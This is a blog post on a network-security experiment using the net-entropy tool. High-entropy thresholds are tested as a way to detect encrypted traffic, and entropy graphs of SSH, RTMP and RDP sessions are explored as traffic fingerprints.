  • Did it detect stuff that wasn’t encrypted? Yes!
  • Did it fail to detect traffic that definitely was encrypted? Yes!
  • Was the experiment a total failure and a complete waste of time? No! Far from it, in fact.

The theory I was testing was that traffic with sufficient entropy might be encrypted, since high entropy is a property of decent encryption algorithms. net-entropy was set to trigger an alert if it saw any connections whose entropy crossed an arbitrarily chosen threshold of 7.9 (8.0 is the maximum), and protocols that were expected to be encrypted (HTTPS, etc.) were filtered out.

Here’s a summary of what I’ve found so far:

  • Encrypted traffic that crossed the 7.9 threshold included Windows Remote Desktop (RDP), Skype (both calls and signalling traffic), SSH-2, and Google Talk.
  • Unencrypted traffic that crossed the threshold was mainly RTMP (streaming Flash audio/video), and possibly Spotify (I don’t know for sure if Spotify uses encryption or not, but high entropy was observed both on the inbound media from port 4070 and the outbound media on random ports). Media protocols like this are usually highly compressed – high entropy is a side effect of compression as well as encryption.
  • Encrypted traffic that was not detected included SSH-1 (1.5, to be exact). SSH-2 was detected as one would hope, provided that the session was long enough.

Clearly my blunt approach of a single threshold isn’t the most effective one, as we have both false positives and false negatives. But after applying some visualisations to my results, an intriguing possibility presents itself.

net-entropy was installed in this instance on a Sguil box mainly so that it was in a position where it could see a large volume of real-world traffic. A happy side effect of this is that it’s quite simple to extract the raw traffic captures that each net-entropy alert is referring to. If we’ve built net-entropy with the –enable-statistics option, we are then in a position to draw graphs of the entropy of an individual TCP stream:

  • First, use the net-entropy alert to extract the specific TCP stream. The easiest way to do this is to search for it using the Sguil client, and then export the results to Wireshark. Let’s save the capture as session.raw
  • Then we run net-entropy over it in statistics mode:
    $ net-entropy -r session.raw -s mystatsdir -F
     -b -c net-entropy.conf
  • The output of this is a .dat file whose name is made up of a timestamp and the source and dest IP addresses and ports.
  • We can now plot this file in gnuplot:
    plot 'mystatsdir/whateveritwascalled.dat'

By way of a baseline, here is a plot showing the entropy of the first 64KB of an HTTPS and an SSH-2 session. The blue line marks the 7.9 alerting threshold:

net-entropy baseline

Zooming in a little, we can see that HTTPS crossed the threshold after about 2.2KB of data, and SSH-2 took a little longer:

net-entropy zoomLet’s zoom in a little on a different area of the graph – the little “wobble” on the SSH-2 line:

net-entropy ssh-2What we’re looking at here is the part of the conversation where the various parameters of the SSH-2 session are being exchanged (key exchange protocol, encryption/hashing algorithms, etc). These are passed as cleartext, hence the low entropy at this point.

It’s an interesting little pattern, though. Let’s overlay some more SSH sessions onto the one above and see what they look like:

net-entropy sshThere are three sessions illustrated here:

  • The blue line is an SSH-2 session, which in the context of this experiment is a “true positive” since it was encrypted and it did cross the 7.9 threshold
  • The red line is another SSH-2 session which was so short in duration it didn’t manage to make it above 7.9. This is a “false negative” because we’ve missed something that definitely was encrypted.
  • The green line is an SSH-1 session. At no point during this session’s life did it cross the 7.9 threshold – another false negative.

As far as detecting encrypted traffic goes, this clearly isn’t as useful as I’d have hoped. But look at the red and blue lines – look how tightly they follow one another:

net-entropy ssh zoom

This brings us to the intriguing possibility I alluded to earlier – using entropy analysis not for the detection of encrypted traffic, but for the classification of traffic.

What if the entropy of certain types of traffic is reasonably consistent? What if the patterns above represent “fingerprints” for SSH-1 and SSH-2 traffic? If we could match traffic against a library of fingerprints, we’d have a port-independent classifier of sorts.

I’ve not had time yet to analyse sample sets large enough to be anywhere approaching conclusive, but let’s look at some other kinds of traffic:

The following graph shows four RTMP sessions:

net-entropy rtmpWhilst RTMP isn’t encrypted, all four sessions have a similar visual fingerprint.

Now let’s look at nine RDP sessions (Windows Remote Desktop):

net-entropy rdpThe most obvious outlier here is the black line – this was an RDP session to a server whose encryption level was set to “Low”. If we zoom in a bit, we’ll see another outlier:

net-entropy rdp zoomThe orange line is significantly different to the others. This particular session sent the string “Cookie: mstshash=machinename” in the first data segment sent from the client to the server – the other sessions had mostly zeroes instead, hence the lower entropy at this point. Since this is the very first data segment in the session, we could possibly infer that we’re looking at different client software used to make the connection. Indeed, if we look at RDP sessions from rdesktop (rather than the Windows client), the entropy looks different still:

net-entropy rdp rdesktopThe entropy is low, relative to the Windows client, and there’s a slightly different signature at the start of the connection:

net-entropy rdp rdesktop zoomOne might be tempted to think that one could look at graphs like these and infer something about both the server (encryption level in use) and the client (type of software used).

OK. Enough graphs. Summary time.

Detecting encrypted traffic with a straightforward entropy threshold doesn’t seem to be useful. However, we may be able to use entropy analysis as a means to classify traffic in a port-independent manner, but I’ve analysed nowhere near enough traffic to assess whether this could be a viable technique or not (there are bound to be loads of outlying cases that don’t fit the profile). And even if it is a viable technique, are the bases already covered by other port-independent classifiers (l7filter, et al)? That said, I’m not the first person to explore various visualisations of encrypted traffic, so someone somewhere considers the broad concept useful.

Comments welcome!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk